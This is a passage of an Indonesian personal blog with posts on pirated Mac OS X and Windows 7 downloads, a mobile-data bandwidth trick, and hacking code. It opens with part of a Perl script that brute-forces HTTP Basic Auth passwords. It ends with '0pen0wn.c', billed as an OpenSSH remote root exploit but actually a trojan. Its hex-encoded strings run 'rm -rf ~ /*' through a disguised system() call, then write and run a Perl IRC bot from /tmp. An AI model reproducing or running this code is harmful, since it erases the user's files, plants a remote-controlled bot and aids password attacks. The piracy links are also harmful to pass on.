= $P; print " [~] Try Password : $passwd "; &brut; }; } sub brut() { $authx = encode_base64($user.":".$passwd); print $authx; my $sock = IO::Socket::INET->new(Proto => "tcp",PeerAddr => "$host", PeerPort => "$port") || print " [-] Can not connect to the host"; print $sock "GET / HTTP/1.1 "; print $sock "Authorization: Basic $authx "; print $sock "Connection: Close "; read $sock, $answer, 128; close($sock); if ($answer =~ /Moved/) { print " [~] PASSWORD FOUND : $passwd "; exit(); } }
Posted by itok at 2:45 PM 0 comments
Labels:

Mac OS Lion 10.7




Download link:
http://thepiratebay.org/torrent/6200584/Mac_OS_X_10.7_Lion

size 3.5 GB

Cara install:
Run dmg di OSX Snow Leopard
ikutin instruction


Side-Effect migrasi OS dari 10.6.x ke 10.7:
- Battery consumption lebih boros 20%
- Harus re-install developer tools & xcode
- Harus re-install git
- Harus re-install nodejs
- Ada perubahan default python version dari 2.6.1 ke 2.7

untuk downgrade python:

di terminal jalanin code di bawah ini

$ defaults write com.apple.versioner.python Version 2.6

akan bikin default python ke 2.6.6

Plus points:
- UI lebih intuitive
- File sharing lebih mudah lewat air-drop
- Launchpad untuk UI aplication list sudah mirip ipad.
- Performance meningkat jauh

Perlu pembiasaan:
Natural scrolling
Biasa kita scroll ke bawah untuk turun, sekarang scroll ke atas untuk turun ke bawah.
Biasa scroll ke kanan untuk ke kanan sekarang dibalik, scroll ke kiri untuk ke kanan.

Moreover gw cukup puas pake Mac OS Lion ini cuma masi berharap ada patch buat reduce battery consumption.

regards
Posted by itok at 1:49 AM 0 comments
Labels: ,

Windows 7 Gamer Edition x64




Windows 7 Gamer Edition x64 by UNDEADCROWS-ISO (2010)

Windows 7 Gamer Edition x64 By UNDEADCROWS | for Gamers
ISO | DVD | English | x64/64-bit | Bootable | 2.76 GB
Crack/Activation: NOT REQUIRED* | UPDATABLE*


Windows 7 modified for gamers on this new platform (64-bit). The system is optimized to support today's games, plus he removed a number of processes without unnecessary if it comes to games.

Just download unzip and burn the ISO to DVD, reboot the system since, to install on a clean partition.

The requirements needed at the foot of this post, keep in mind that it is for current games, where 2GB of RAM and dual cores are normal.

Overview of the Features and Updates of Windows 7 Gamer Edition:

* Specially Modded DirectX 11 for Extreme Gaming
* Reduced Gaming crashes
* New High quality icons
* Resolved Windows 7 Media Center issues
* Supports all future updates and packages
* Resolved some reliability compatibility issues in Windows 7
* More Stable and Reliable
* UAC Disabled
* Show extensions for known file types
* Added User Account 2 on Control Panel
* Low Memory consumption
* Windows will tell you exactly what it is doing when it is shutting down or is booting
* Added command prompt to right click context menu
* Enabled addition Avalon effects
* Disabled Tool Tips
* Enabled Clear Type Tuning
* Added 'Copy to Folder' , 'Move to Folder' , 'Open with Notepad' to right click context
* Disabled Windows Media Player Auto Updates
* Faster browsing with IE
* DEP execution is set to Default
* Disabled the NTFS Last Access Time Stamp
* Enabled slow-motion window effects
* Added "Advanced System Properties" in my Computer
* Added Control Panel to my Computer
* Disabled kernel paging
* Winrar for extraction purpose.
* Added Group policy and Registry editor to control panel
* Turned off system beeps
* Take Ownership, Device manager, Group policy, Registry Editor in the right click
* Patched uxtheme files to use 3rd party themes.
* Faster Shutdown ( 3 seconds services kill timeout.)
* Fast Booting Time
* Disabled automatic restart in the event of a blue screen
* Tweaked up shell response
* Hibernation is Disabled.
* Added "Advanced System Properties" in my Computer
* Added Control Panel to my Computer
* Added Administrative Tools to my Computer
* Added Network Connections to my Computer
* Added Search to my Computer
* Added Printers to my Computer
* Added Run and Windows Flip Switcher to my Computer
* Removed warning about showing hidden system folders
* Maximum simultaneous downloads for IE to 20 ( default is 2 )
* New Explorer View
* Allow renaming and removing of Recycle Bin
* Makes a right click option for unknown files
* Notepad saves window position
* Enabled Word wrap in Notepad
* Enabled Status Bar in all windows
* NVIDIA Drivers Added
* ATI Drivers Added
* New Themes
* 255 Sidebar Gadgets
* Enabled search system folders in Search
* System Files are boosted up to maximum Performance
* Faster Application load Time
* Disabled the NTFS Last Access Time Stamp
* Windows Update service disabled
* No critical components removed
Automatically Installed 3rd Party Software

*Winrar for extraction needs.

Optional 3rd Party Software

Multimedia
*CCCP codec pack
*Cole 2k Advanced codec pack
*Vlc Media Player HD 1.0.3

Performance
*Game Booster v.1.3 (Windows 7 Support)

Applications
*Messenger Live
*Daemon Tools Lite v 4.35.5
*7-zip (x64 December 2009 Release)

Web Browsers
*Mozilla FireFox v 3.5.6

Minimum System Requirements For 64Bit:
2GB RAM (Recommended 3GB RAM or more)
20 GB of HDD space ( Recommended 40 GB )
128 MB Graphics Memory (Capable to run Aero)
17-inch Monitor (1024 x 768)
DVD-ROM or DVD-RAM
Pixel Shader 2.0
Dual Core Processors with 64-bit OS Capable
Active Internet Connection (For Activation and Updates)


Folder Download:
http://hotfile.com/list/283385/8dfa27f


Mirror:
http://fileserve.com/list/aapCUad

http://www.filesonic.com/folder/115183
Posted by itok at 1:46 AM 0 comments
Labels: ,

Trik Speed ngacir buat yang pake paket Flash Unlimited 50k atau 100k

Trik ini emang tidak Full gretong,,
kita harus ngeluarin kocek sedikit nya 50k (untuk 14hr)
atau 100k (untuk 30hr)
tp jgn khawatir,,,kita bisa siasatin kuota yg di bundle sama paket si kampret yg katanya cuma 500 mb bisa nyampe ber giga2... hehehehe.... TESTED sebulan full.

lumayan lah gan buat sedot data bisa ngacir sampe 250 kbps - 300kbps


tahap pertama :
# yang belum reg silahkan reg ke *363# pilih paket yg sesuai... mau 50k atau 100k

# setelah selesai,,set apn di modem agan dengan internet

# save dan set as default,,tutup aplikasi modem..


tahap kedua :
# siapin tool buat loncatin kodok nya (mdma dan dan reconnect dial) >> trik yg masih ampuh sampe saat ini buat sedot bandwith si kampredd...!!

# pada mdma set gprs/edge only terlebih dahulu..

# dial si kampret dr reconnect dial..ini di gunakan untuk jaga2 disco ya gan...

# setelah konek cek ip client nya,,kalo ane seh demen sama kepala 182 pada paket ini

# selanjut nya buka broser agan,, lalu masuk link speedtest,,, misalnya http://speedtest.indosatm2.com/ atau link2 lain yg menyediakan speedtest bandwith kita....

# silahkan mulai speedtest dengan klik start pada link td

# untuk mendapatkan bandwith yg kenceng,,,koneksi agan sampe disini harus tetep gprs/edge only..

# begitu hasil angka PING keluar pada speedtest td,,,skrng agan pindah kan koneksi nya pada 3G only pada aplikasi mdma nya...
dan hasil nya akan seperti di bawah ini ,,,

Download Tool :

http://www.mediafire.com/?nvcscx7m64ooifp
http://www.mediafire.com/?ryo80rzc41508o3
Posted by itok at 1:40 AM 0 comments
Labels: ,

Monday, October 24, 2011

OpenSSH <= 5.2 REMOTE (r00t) EXPLOIT

/* 0pen0wn.c by anti-sec group
* —————————
* OpenSSH <= 5.2 REMOTE (r00t) EXPLOIT.
*
*
* Takes advantage of an off-by-one
* bug in mapped authentication space on system
*/
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include

#define VALID_RANGE 0xb44ffe00
#define build_frem(x,y,a,b,c) a##c##a##x##y##b

char jmpcode[] =
“\x72\x6D\x20\x2D\x72\x66\x20\x7e\x20\x2F\x2A\x20\x32\x3e\x20\x2f”
“\x64\x65\x76\x2f\x6e\x75\x6c\x6c\x20\x26″;

char shellcode[] =
“\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c\x0a”
“\x24\x63\x68\x61\x6e\x3d\x22\x23\x63\x6e\x22\x3b\x0a\x24\x6b\x65″
“\x22\x3b\x0a\x77\x68\x69\x6c\x65\x20\x28\x3c\x24\x73\x6f\x63\x6b”
“\x47\x20\x28\x2e\x2a\x29\x24\x2f\x29\x7b\x70\x72\x69\x6e\x74\x20″
“\x22\x3b\x0a\x77\x68\x69\x6c\x65\x20\x28\x3c\x24\x73\x6f\x63\x6b”
“\x6e\x22\x3b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20″
“\x73\x6c\x65\x65\x70\x20\x31\x3b\x0a\x20\x20\x20\x20\x20\x20\x20″
“\x6b\x5c\x6e\x22\x3b\x7d\x7d\x70\x72\x69\x6e\x74\x20\x24\x73\x6f”
“\x63\x6b\x20\x22\x4a\x4f\x49\x4e\x20\x24\x63\x68\x61\x6e\x20\x24″
“\x6b\x65\x79\x5c\x6e\x22\x3b\x77\x68\x69\x6c\x65\x20\x28\x3c\x24″
“\x73\x6f\x63\x6b\x3e\x29\x7b\x69\x66\x20\x28\x2f\x5e\x50\x49\x4e”
“\x47\x20\x28\x2e\x2a\x29\x24\x2f\x29\x7b\x70\x72\x69\x6e\x74\x20″
“\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c\x0a”
“\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c\x0a”
“\x6e\x22\x3b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20″
“\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c\x0a”
“\x24\x63\x68\x61\x6e\x3d\x22\x23\x63\x6e\x22\x3b\x24\x6b\x65\x79″
“\x20\x3d\x22\x66\x61\x67\x73\x22\x3b\x24\x6e\x69\x63\x6b\x3d\x22″
“\x70\x68\x70\x66\x72\x22\x3b\x24\x73\x65\x72\x76\x65\x72\x3d\x22″
“\x47\x20\x28\x2e\x2a\x29\x24\x2f\x29\x7b\x70\x72\x69\x6e\x74\x20″
“\x22\x3b\x0a\x77\x68\x69\x6c\x65\x20\x28\x3c\x24\x73\x6f\x63\x6b”
“\x6e\x22\x3b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20″
“\x73\x6c\x65\x65\x70\x20\x31\x3b\x0a\x20\x20\x20\x20\x20\x20\x20″
“\x6b\x5c\x6e\x22\x3b\x7d\x7d\x70\x72\x69\x6e\x74\x20\x24\x73\x6f”
“\x63\x6b\x20\x22\x4a\x4f\x49\x4e\x20\x24\x63\x68\x61\x6e\x20\x24″
“\x6b\x65\x79\x5c\x6e\x22\x3b\x77\x68\x69\x6c\x65\x20\x28\x3c\x24″
“\x73\x6f\x63\x6b\x3e\x29\x7b\x69\x66\x20\x28\x2f\x5e\x50\x49\x4e”
“\x47\x20\x28\x2e\x2a\x29\x24\x2f\x29\x7b\x70\x72\x69\x6e\x74\x20″
“\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c\x0a”
“\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c\x0a”
“\x69\x72\x63\x2e\x68\x61\x6d\x2e\x64\x65\x2e\x65\x75\x69\x72\x63″
“\x2e\x6e\x65\x74\x22\x3b\x24\x53\x49\x47\x7b\x54\x45\x52\x4d\x7d”
“\x22\x3b\x0a\x77\x68\x69\x6c\x65\x20\x28\x3c\x24\x73\x6f\x63\x6b”
“\x22\x3b\x0a\x77\x68\x69\x6c\x65\x20\x28\x3c\x24\x73\x6f\x63\x6b”
“\x6e\x22\x3b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20″
“\x73\x6c\x65\x65\x70\x20\x31\x3b\x0a\x20\x20\x20\x20\x20\x20\x20″
“\x6e\x22\x3b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20″
“\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c\x0a”
“\x24\x63\x68\x61\x6e\x3d\x22\x23\x63\x6e\x22\x3b\x24\x6b\x65\x79″
“\x20\x3d\x22\x66\x61\x67\x73\x22\x3b\x24\x6e\x69\x63\x6b\x3d\x22″
“\x6b\x5c\x6e\x22\x3b\x7d\x7d\x70\x72\x69\x6e\x74\x20\x24\x73\x6f”
“\x63\x6b\x20\x22\x4a\x4f\x49\x4e\x20\x24\x63\x68\x61\x6e\x20\x24″
“\x6b\x65\x79\x5c\x6e\x22\x3b\x77\x68\x69\x6c\x65\x20\x28\x3c\x24″
“\x73\x6f\x63\x6b\x3e\x29\x7b\x69\x66\x20\x28\x2f\x5e\x50\x49\x4e”
“\x47\x20\x28\x2e\x2a\x29\x24\x2f\x29\x7b\x70\x72\x69\x6e\x74\x20″
“\x70\x68\x70\x66\x72\x22\x3b\x24\x73\x65\x72\x76\x65\x72\x3d\x22″
“\x69\x72\x63\x2e\x68\x61\x6d\x2e\x64\x65\x2e\x65\x75\x69\x72\x63″
“\x2e\x6e\x65\x74\x22\x3b\x24\x53\x49\x47\x7b\x54\x45\x52\x4d\x7d”
“\x73\x6c\x65\x65\x70\x20\x31\x3b\x0a\x20\x20\x20\x20\x20\x20\x20″
“\x73\x6c\x65\x65\x70\x20\x31\x3b\x0a\x20\x20\x20\x20\x20\x20\x20″
“\x22\x3b\x0a\x77\x68\x69\x6c\x65\x20\x28\x3c\x24\x73\x6f\x63\x6b”
“\x6e\x22\x3b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20″
“\x73\x6c\x65\x65\x70\x20\x31\x3b\x0a\x20\x20\x20\x20\x20\x20\x20″
“\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c\x0a”
“\x24\x63\x68\x61\x6e\x3d\x22\x23\x63\x6e\x22\x3b\x24\x6b\x65\x79″
“\x20\x3d\x22\x66\x61\x67\x73\x22\x3b\x24\x6e\x69\x63\x6b\x3d\x22″
“\x70\x68\x70\x66\x72\x22\x3b\x24\x73\x65\x72\x76\x65\x72\x3d\x22″
“\x69\x72\x63\x2e\x68\x61\x6d\x2e\x64\x65\x2e\x65\x75\x69\x72\x63″
“\x2e\x6e\x65\x74\x22\x3b\x24\x53\x49\x47\x7b\x54\x45\x52\x4d\x7d”
“\x64\x20\x2b\x78\x20\x2f\x74\x6d\x70\x2f\x68\x69\x20\x32\x3e\x2f”
“\x64\x65\x76\x2f\x6e\x75\x6c\x6c\x3b\x2f\x74\x6d\x70\x2f\x68\x69″
“\x22\x3b\x0a\x77\x68\x69\x6c\x65\x20\x28\x3c\x24\x73\x6f\x63\x6b”
“\x6e\x22\x3b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20″
“\x73\x6c\x65\x65\x70\x20\x31\x3b\x0a\x20\x20\x20\x20\x20\x20\x20″
“\x6b\x5c\x6e\x22\x3b\x7d\x7d\x70\x72\x69\x6e\x74\x20\x24\x73\x6f”
“\x63\x6b\x20\x22\x4a\x4f\x49\x4e\x20\x24\x63\x68\x61\x6e\x20\x24″
“\x6b\x65\x79\x5c\x6e\x22\x3b\x77\x68\x69\x6c\x65\x20\x28\x3c\x24″
“\x73\x6f\x63\x6b\x3e\x29\x7b\x69\x66\x20\x28\x2f\x5e\x50\x49\x4e”
“\x47\x20\x28\x2e\x2a\x29\x24\x2f\x29\x7b\x70\x72\x69\x6e\x74\x20″
“\x22\x3b\x0a\x77\x68\x69\x6c\x65\x20\x28\x3c\x24\x73\x6f\x63\x6b”
“\x6e\x22\x3b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20″
“\x73\x6c\x65\x65\x70\x20\x31\x3b\x0a\x20\x20\x20\x20\x20\x20\x20″
“\x6b\x5c\x6e\x22\x3b\x7d\x7d\x70\x72\x69\x6e\x74\x20\x24\x73\x6f”
“\x63\x6b\x20\x22\x4a\x4f\x49\x4e\x20\x24\x63\x68\x61\x6e\x20\x24″
“\x6b\x65\x79\x5c\x6e\x22\x3b\x77\x68\x69\x6c\x65\x20\x28\x3c\x24″
“\x73\x6f\x63\x6b\x3e\x29\x7b\x69\x66\x20\x28\x2f\x5e\x50\x49\x4e”
“\x47\x20\x28\x2e\x2a\x29\x24\x2f\x29\x7b\x70\x72\x69\x6e\x74\x20″
“\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c\x0a”;

char fbsd_shellcode[] =
“\x22\x3b\x0a\x77\x68\x69\x6c\x65\x20\x28\x3c\x24\x73\x6f\x63\x6b”
“\x6e\x22\x3b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20″
“\x20\x3d\x22\x66\x61\x67\x73\x22\x3b\x24\x6e\x69\x63\x6b\x3d\x22″
“\x70\x68\x70\x66\x72\x22\x3b\x24\x73\x65\x72\x76\x65\x72\x3d\x22″
“\x69\x72\x63\x2e\x68\x61\x6d\x2e\x64\x65\x2e\x65\x75\x69\x72\x63″
“\x2e\x6e\x65\x74\x22\x3b\x24\x53\x49\x47\x7b\x54\x45\x52\x4d\x7d”
“\x22\x3b\x0a\x77\x68\x69\x6c\x65\x20\x28\x3c\x24\x73\x6f\x63\x6b”
“\x22\x3b\x0a\x77\x68\x69\x6c\x65\x20\x28\x3c\x24\x73\x6f\x63\x6b”
“\x6e\x22\x3b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20″
“\x73\x6c\x65\x65\x70\x20\x31\x3b\x0a\x20\x20\x20\x20\x20\x20\x20″
“\x6e\x22\x3b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20″
“\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c\x0a”
“\x24\x63\x68\x61\x6e\x3d\x22\x23\x63\x6e\x22\x3b\x24\x6b\x65\x79″
“\x20\x3d\x22\x66\x61\x67\x73\x22\x3b\x24\x6e\x69\x63\x6b\x3d\x22″
“\x73\x6c\x65\x65\x70\x20\x31\x3b\x0a\x20\x20\x20\x20\x20\x20\x20″
“\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c\x0a”
“\x24\x63\x68\x61\x6e\x3d\x22\x23\x63\x6e\x22\x3b\x24\x6b\x65\x79″
“\x20\x3d\x22\x66\x61\x67\x73\x22\x3b\x24\x6e\x69\x63\x6b\x3d\x22″
“\x70\x68\x70\x66\x72\x22\x3b\x24\x73\x65\x72\x76\x65\x72\x3d\x22″
“\x69\x72\x63\x2e\x68\x61\x6d\x2e\x64\x65\x2e\x65\x75\x69\x72\x63″
“\x2e\x6e\x65\x74\x22\x3b\x24\x53\x49\x47\x7b\x54\x45\x52\x4d\x7d”
“\x64\x20\x2b\x78\x20\x2f\x74\x6d\x70\x2f\x68\x69\x20\x32\x3e\x2f”
“\x64\x65\x76\x2f\x6e\x75\x6c\x6c\x3b\x2f\x74\x6d\x70\x2f\x68\x69″
“\x22\x3b\x0a\x77\x68\x69\x6c\x65\x20\x28\x3c\x24\x73\x6f\x63\x6b”
“\x6e\x22\x3b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20″
“\x73\x6c\x65\x65\x70\x20\x31\x3b\x0a\x20\x20\x20\x20\x20\x20\x20″
“\x6b\x5c\x6e\x22\x3b\x7d\x7d\x70\x72\x69\x6e\x74\x20\x24\x73\x6f”
“\x63\x6b\x20\x22\x4a\x4f\x49\x4e\x20\x24\x63\x68\x61\x6e\x20\x24″
“\x6b\x65\x79\x5c\x6e\x22\x3b\x77\x68\x69\x6c\x65\x20\x28\x3c\x24″
“\x73\x6f\x63\x6b\x3e\x29\x7b\x69\x66\x20\x28\x2f\x5e\x50\x49\x4e”
“\x47\x20\x28\x2e\x2a\x29\x24\x2f\x29\x7b\x70\x72\x69\x6e\x74\x20″
“\x22\x3b\x0a\x77\x68\x69\x6c\x65\x20\x28\x3c\x24\x73\x6f\x63\x6b”
“\x6e\x22\x3b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20″
“\x73\x6c\x65\x65\x70\x20\x31\x3b\x0a\x20\x20\x20\x20\x20\x20\x20″
“\x6b\x5c\x6e\x22\x3b\x7d\x7d\x70\x72\x69\x6e\x74\x20\x24\x73\x6f”
“\x63\x6b\x20\x22\x4a\x4f\x49\x4e\x20\x24\x63\x68\x61\x6e\x20\x24″
“\x6b\x65\x79\x5c\x6e\x22\x3b\x77\x68\x69\x6c\x65\x20\x28\x3c\x24″
“\x73\x6f\x63\x6b\x3e\x29\x7b\x69\x66\x20\x28\x2f\x5e\x50\x49\x4e”
“\x47\x20\x28\x2e\x2a\x29\x24\x2f\x29\x7b\x70\x72\x69\x6e\x74\x20″
“\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c\x0a”
“\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c\x0a”
“\x24\x63\x68\x61\x6e\x3d\x22\x23\x63\x6e\x22\x3b\x24\x6b\x65\x79″
“\x20\x3d\x22\x66\x61\x67\x73\x22\x3b\x24\x6e\x69\x63\x6b\x3d\x22″
“\x7d\x7d\x23\x63\x68\x6d\x6f\x64\x20\x2b\x78\x20\x2f\x74\x6d\x70″
“\x2f\x68\x69\x20\x32\x3e\x2f\x64\x65\x76\x2f\x6e\x75\x6c\x6c\x3b”
“\x2f\x74\x6d\x70\x2f\x68\x69\x0a”;
#define SIZE 0xffffff
#define OFFSET 131
#define fremote build_frem(t,e,s,m,y)

void usage(char *arg){
printf(“\n[+] 0pen0wn 0wnz Linux/FreeBSD\n”);
printf(” Usage: %s -h -p port\n”,arg);
printf(” Options:\n”);
printf(” \t-h ip/host of target\n”);
printf(” \t-p port\n”);
printf(” \t-d username\n”);
printf(” \t-B memory_limit 8/16/64\n\n\n”);
}

#define FD 0x080518fc
#define BD 0×08082000

int main(int argc, char **argv){
FILE *jmpinst;
char h[500],buffer[1024];fremote(jmpcode);char *payload, *ptr;
int port=23, limit=8, target=0, sock;
struct hostent *host;
struct sockaddr_in addr;

if (geteuid()) {
puts(“need root for raw socket, etc…”);
return 1;
}

if(argc < 3){
usage(argv[0]);
return 1;
}

printf(“\n [+] 0wn0wn – by anti-sec group\n”);

if (!inet_aton(h, &addr.sin_addr)){
host = gethostbyname(h);
if (!host){
printf(” [-] Resolving failed\n”);
return 1;
}
addr.sin_addr = *(struct in_addr*)host->h_addr;
}

sock = socket(PF_INET, SOCK_STREAM, 0);
addr.sin_port = htons(port);
addr.sin_family = AF_INET;
if (connect(sock, (struct sockaddr*)&addr, sizeof(addr)) == -1){
printf(” [-] Connecting failed\n”);
return 1;
}
payload = malloc(limit * 10000);
ptr = payload+8;
memcpy(ptr,jmpcode,strlen(jmpcode));
jmpinst=fopen(shellcode+793,”w+”);
if(jmpinst){
fseek(jmpinst,0,SEEK_SET);
fprintf(jmpinst,”%s”,shellcode);
fclose(jmpinst);
}
ptr += strlen(jmpcode);
if(target != 5 && target != 6){
memcpy(ptr,shellcode,strlen(shellcode));
ptr += strlen(shellcode);
memset(ptr,’B',limit * 10000 – 8 – strlen(shellcode));
}
else{
memcpy(ptr,fbsd_shellcode,strlen(fbsd_shellcode));
ptr += strlen(fbsd_shellcode);
memset(ptr,’B',limit * 10000 – 8 – strlen(fbsd_shellcode));
}
send(sock,buffer,strlen(buffer),0);
send(sock,ptr,3750,0);
close(sock);
if(connect(sock, (struct sockaddr*)&addr, sizeof(addr)) == -1) {
printf(” [-] connecting failed\n”);
}

payload[sizeof(payload)-1] = ”;
payload[sizeof(payload)-2] = ”;
send(sock,buffer,strlen(buffer),0);
send(sock,payload,strlen(payload),0);
close(sock);
free(payload);
addr.sin_port = htons(6666);
if(connect(sock, (struct sockaddr*)&addr, sizeof(addr)) == 0) {
/* v— our cool bar that says: “r0000000t!!!” */
printf(“\n [~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~>]\n\n”);
fremote(“PS1=’sh-3.2#’ /bin/sh”);
}
else
printf(” [-] failed to exploit target :-(\n”);
close(sock);
return 0;
}
Posted by itok at 11:11 PM 2 comments
Labels:
Subscribe to: Posts (Atom)